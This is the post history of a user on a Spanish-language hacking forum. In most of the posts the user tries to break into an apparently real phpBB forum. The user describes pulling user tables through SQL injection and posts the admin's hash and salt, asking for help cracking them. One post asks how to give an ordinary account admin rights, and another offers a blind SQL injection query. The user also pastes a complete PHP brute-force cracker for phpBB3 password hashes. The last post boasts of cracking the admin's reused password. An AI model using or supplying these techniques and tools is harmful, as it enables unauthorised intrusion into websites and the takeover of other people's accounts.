Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - xustyx

Páginas 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
#231
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 18:47 PM
BUENO PORFIN XUSTY 1 WEB 0 !!!!!!!!!!!!!!!!!!!!

Nada no consegui descifrar nada de eso lo que hice fue lo siguiente.

Como consegui los datos por un SQLi lo que hize al cabo de horas i horas fue mirar otras Data Bases y me di cuenta de algo en otras Data bases habian tambien phpbb_ y yo dije juer que raro bueno que me puse a trastear i sace unos cuantos users a los que probe en el foro i Lo sentimos pero debido al update del foro no emos podido convertir tu pass porfavor intreoduzela tal tal..
entonces dije esto tiene algo que ver y claro que lo tenia era el foro antiguo en phpbb2 jajajaj lo que hize fue cojer la tabla de users i Bingo por suerte estaban en md5.

Por asombro mio cuando desencrypte el MD5 me di cuenta de que el admin tenia muy poca creatividad y encima no se molestaron ni a cambiar el pass al cambiar el foro.

Un saludo a todos y espero que os sirva a alguno ya ves aveces la solucion esta buscando en otro sitio :))))
#232
Criptografía / Re: Un Hash de PHPBB3
14 Junio 2010, 15:17 PM
Bueno he encontrado la manera en que codifica la pass

base64(md5+salt);

alguien sabe algun programa que me deje poner esos parametros y que intente a bruteforce por charset??¿?
#233
Criptografía / Un Hash de PHPBB3
14 Junio 2010, 04:39 AM
Bueno como creo que esto va mejor aqui posteo aqui esta es mi duda  :-\

HASH: $H$9YSi5FYkRx4aIMejyZo.9LCvuefQb31
SALT: 16eeb051d024903a
PASS: deface

entonces si....

HASH: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
SALT: ca28b6b43c28f6b3
PASS: ???????????????????? Como la puedo sacar?¿?¿?

Un saludo i gracias.
#234
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 03:42 AM
Bueno sigo aportando mas cosas :)

HASH: $H$9YSi5FYkRx4aIMejyZo.9LCvuefQb31
SALT: 16eeb051d024903a
PASS: deface

entonces si....

HASH: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
SALT: ca28b6b43c28f6b3
PASS: ???????????????????? Como la puedo sacar?¿?¿?
#235
Nivel Web / Re: [SQLi]MSSQL ayuda.
14 Junio 2010, 01:54 AM
Tu lo que buscas es esto :)

SELECT nombre FROM usuarios WHERE id=2 AND (SELECT Count(*) FROM usuarios WHERE SUBSTRING(user,1,1)=char(97)) > 0

;)
#236
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 01:31 AM
Bueno si todo esto no funciona... Alguien sabe algun modo de obtener Permisos Admin en un user normal?¿ Algo como crear un user y añadirle a la tabla de permisos el rango de admin. No se si mediante una inyeccion xploit o lo que sea sera posbile eso :S
#237
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 01:02 AM
Por cierto el Script Funciona :D
Pero vamos attempting to crack with 4 characters. Tal vez si tengo suerte i el admin a puesto una pass corta funcione :)
#238
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 00:58 AM
Na si pongo cualquier table la que sea users o alguna otra siempre me da lo mismo.
Asipt_table."nombre de la tabla que pongo"
Es un prefix que ponen al hacer la consulta talvez aya algun modo de borrar el prefix y entonces si que funcione pero no se no se :S
#239
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 00:33 AM
Ahh! os dejo el script por aqui si alguien lo necesita :)
Código (php) [Seleccionar]
/////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// [2008-07-15] PhpBB3 Hash Bruteforce// http://r00tsecurity.org/db/code/134// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// GENERATED ON: 2010-06-13 | 17:52:35/////////////////////////////////////////////////////////////////CODE INFOUSAGE:
php script.php 'hash' charsSOURCE CODE#!/usr/bin/php
<?php
set_time_limit(0);

echo "///////////////////////////////////////////////\r\n";
echo "//         PHPBB3 Bruteforce             //\r\n";
echo "//  Original bruteforce script by Tux      //\r\n";
echo "//     Moded for Phpbb3 by Jeforce     //\r\n";
echo "//     http://www.jeforce.net            //\r\n";
echo "////////////////////////////////////////////\r\n";

if ($argc<|| $argv[1]=='--help') {
    echo<<<END
USAGE: {$argv[0]} 'hash' chars
    - hash        : The hash to crack
    - chars        : Max length string to attempt to crack

HELP: {$argv[0]} --help


END;
    exit;
}
//Fonction PHPBB3

function _hash_crypt_private($password$setting, &$itoa64)
{
$output '*';
// Check for correct hash
if (substr($setting03) != '$H$')
{return $output;}

$count_log2 strpos($itoa64$setting[3]);
if ($count_log2 || $count_log2 30)
{return $output;}
$count << $count_log2;
$salt substr($setting48);
if (strlen($salt) != 8)
{return $output;}

$hash pack('H*'md5($salt $password));
do
{
$hash pack('H*'md5($hash $password));
}
while (--$count);
$output substr($setting012);
$output .= _hash_encode64($hash16$itoa64);
return $output;
}
function _hash_gensalt_private($input, &$itoa64$iteration_count_log2 6)
{
if ($iteration_count_log2 || $iteration_count_log2 31)
{$iteration_count_log2 8;}
$output '$H$';
$output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 3), 30)];
$output .= _hash_encode64($input6$itoa64);
return $output;
}

/**
* Encode hash
*/
function _hash_encode64($input$count, &$itoa64)
{
$output '';
$i 0;
do
{
$value ord($input[$i++]);
$output .= $itoa64[$value 0x3f];
if ($i $count)
{$value |= ord($input[$i]) << 8;}
$output .= $itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
{break;}
if ($i $count)
{$value |= ord($input[$i]) << 16;}
$output .= $itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
{break;}
$output .= $itoa64[($value >> 18) & 0x3f];
}
while ($i $count);
return $output;
}
function phpbb_check_hash($password$hash)
{
$itoa64 './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if (strlen($hash) == 34)
{
return (_hash_crypt_private($password$hash$itoa64) === $hash) ? true false;
}
return (md5($password) === $hash) ? true false;
}

//if(isset($argv[4])) $charset=$argv[4];
//else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

$charset 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$charset_beginning $charset{0};
$charset_end $charset{strlen($charset)-1};

//$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
// $SIZE = (int) $_GET['chars'];
$HASH $argv[1];
$SIZE = (int) $argv[2];

$start time()-1;
$curtotal=0;
$total=0;
for($i=$SIZE$i>0$i--) $total+=pow(strlen($charset), $i);
$split=ceil(($total/strlen($charset))/5);


echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
echo " *** TOTAL KEYS: $total\r\n";
echo " *** CHARSET: $charset\r\n";

for($i=1$i<=$SIZE$i++) {
    $keyspace pow(strlen($charset), $i);
    echo "\r\nAttempting to crack with $i characters.\r\n";
    echo " *** Total combinations: $keyspace\r\n";

    $key '';
    for ($y=0$y<$i$y++) $key .= $charset_beginning;

    for ($x=0$x<$keyspace+1$x++) {
        $curtotal++;

        if (phpbb_check_hash($key$HASH)) {
            $time=(time()-$start);
            echo<<<END

Successfully key cracked after $time seconds. The cracker searched a total
of $curtotal keys out of a possible $total in $time seconds.

Found the clear text of '$HASH' is '$key'.\n
END;
            exit;
        }

        if($x%$split == 0) {
            $rate=ceil($curtotal/(time()-$start));
            echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
        }

        for ($y=0$y<$i$y++) {
            if ($key[$y] != $charset_end) {
                $key[$y] = $charset{strpos($charset$key[$y])+1};
              
                if ($y 0)  for ($z 0$z $y$z++) $key[$z] = $charset_beginning;
                break;
            }
        }
    }
}
$time=time()-$start;
echo<<<END
*** SORRY NO MATCHS FOUND
    Time running : $time. Keys searched : $total.\n
END;
?>// http://r00tsecurity.org/db/code/134

Hasta luego!
#240
Nivel Web / Re: SQLi PhpBB3 y Hash :S Cosas que no entiendo.
14 Junio 2010, 00:30 AM
Weno haber si alguien me echa una mano jijiji

De momento he estado investigando y buscando por hay por hay.
He encontrado algo pero aun no lo he probado y ahora probare que me tenio que instalar el php para ejecutar un Script haber si rula. Tambien he encontrado una columna muy curiosa llamada user_form_salt y parece que funciona al azahar:)
Bueno en definitiva que tengo esto.

User: Admin
Hash: $H$9tJpe2rPbpx2LBGc1gb/9BqVfrmDhS/
Salt: ca28b6b43c28f6b3

Weno voy a probar el script.
Echarme el ultimo empujoncito si algien sabre resolver lo que falta :D

Un saludo a todos :)
Páginas 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25